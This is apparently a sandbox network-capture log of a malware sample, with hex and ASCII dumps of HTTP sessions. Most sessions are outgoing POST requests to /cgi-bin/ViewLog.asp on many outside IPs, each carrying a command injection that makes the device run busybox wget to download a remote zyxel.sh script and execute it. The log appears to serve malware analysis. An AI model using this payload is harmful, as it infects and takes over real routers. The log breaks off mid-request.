                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:51Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            51192.168.2.2352172104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:55.816873074 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:51Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            52192.168.2.2352174104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.125013113 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:51Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            53192.168.2.2352176104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.446863890 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:52Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            54192.168.2.233680688.218.206.3380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.573045015 CET37INData Raw: 53 6f 5e 5f 52 3c 78 7b 76 4a 34 65 21 25 62 34 6c 23 39 44 5d 68 6d 0d 0a
                                                            Data Ascii: So^_R<x{vJ4e!%b4l#9D]hm


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            55192.168.2.233897831.177.84.498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.612147093 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:57.859658003 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            56192.168.2.234639894.120.2.68080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.620342016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            57192.168.2.235464294.120.226.218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.620405912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            58192.168.2.236097894.123.94.1268080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.620496988 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            59192.168.2.234398894.121.201.258080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.621088028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            60192.168.2.2352190104.171.178.7323
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.773612022 CET179INHTTP/1.0 200 OK
                                                            Server: Proxy
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 32 37 3a 35 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                            Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:27:52Auth Result: .


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            61192.168.2.234086894.123.176.508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.866653919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            62192.168.2.234369662.29.89.428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.867858887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            63192.168.2.234531662.29.65.1958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.869741917 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            64192.168.2.234351631.200.119.268080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.869776011 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            65192.168.2.234013231.40.225.628080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.871630907 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:57.123122931 CET1286INHTTP/1.0 400 Bad Request
                                                            Server: squid/3.1.23
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 07:57:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3167
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            66192.168.2.236056685.209.138.358080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:56.871695042 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:57.123228073 CET1286INHTTP/1.0 400 Bad Request
                                                            Server: squid/3.1.23
                                                            Mime-Version: 1.0
                                                            Date: Wed, 14 Feb 2024 08:02:07 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3167
                                                            X-Squid-Error: ERR_INVALID_URL 0
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            67192.168.2.235989494.125.123.1168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:57.098642111 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
